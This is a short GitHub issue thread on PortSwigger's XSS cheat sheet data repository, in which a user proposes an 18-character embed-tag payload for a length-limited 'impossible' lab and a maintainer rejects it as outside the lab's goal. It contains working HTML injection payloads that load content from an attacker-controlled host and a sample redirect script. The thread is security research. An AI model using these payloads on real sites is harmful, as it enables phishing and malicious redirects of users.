### ISSUE TITLE
Impossible XSS - Basic Context - Length Limit 18 - Arbitrary Code

### ISSUE THREAD

**Issue by stayanonymous** [PortSwigger/xss-cheatsheet-data#9]
**1. Basic context length limit arbitrary code**
Are we considering solutions that execute javascript in a sandbox valid? Such attacks wouldn't be able to target cookies or local storage but could be used to facilitate phishing, redirect the page and serve malicious downloads.

If so the following link is a solution in 18 characters:
http://portswigger-labs.net/impossible-labs/basic-context-length-limit-arbitrary.php?x=%3Cembed%20src=//14.rs

**Possible Attack**
Using the embed/iframe tags it's possible to redirect the page. For example, assuming the attacker owned `a.co`, by using the following payload:
```<embed src=//a.co```

Where `a.co`'s response is:
```<script>top.location="http://google.com"</script>```

This is possible with only 17 characters with access to a short domain, such as `a.co`.

Thanks for your time.

**Comment by hackvertor** [comment]
The goal of the lab is to execute arbitrary JavaScript on the target domain. So this isn't going to be a valid solution but thanks for taking the time to raise this.
